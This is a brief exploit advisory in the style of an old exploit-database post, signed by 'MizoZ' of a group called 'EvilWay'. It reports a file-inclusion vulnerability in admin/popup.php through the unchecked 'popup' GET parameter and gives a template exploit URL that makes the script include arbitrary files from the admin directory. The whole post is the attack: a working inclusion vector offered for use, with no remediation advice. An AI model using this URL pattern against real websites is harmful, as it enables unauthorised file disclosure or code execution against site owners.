/*
Author : MizoZ [from MA]
Group : EvilWay
Email : mizozx[at]gmail[dot]com
Greetz : Zuka !!
Good luck DZ :)
*/
The vulnerability is in the file admin/popup.php on the get $_GET['popup']
Exploit :
[HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]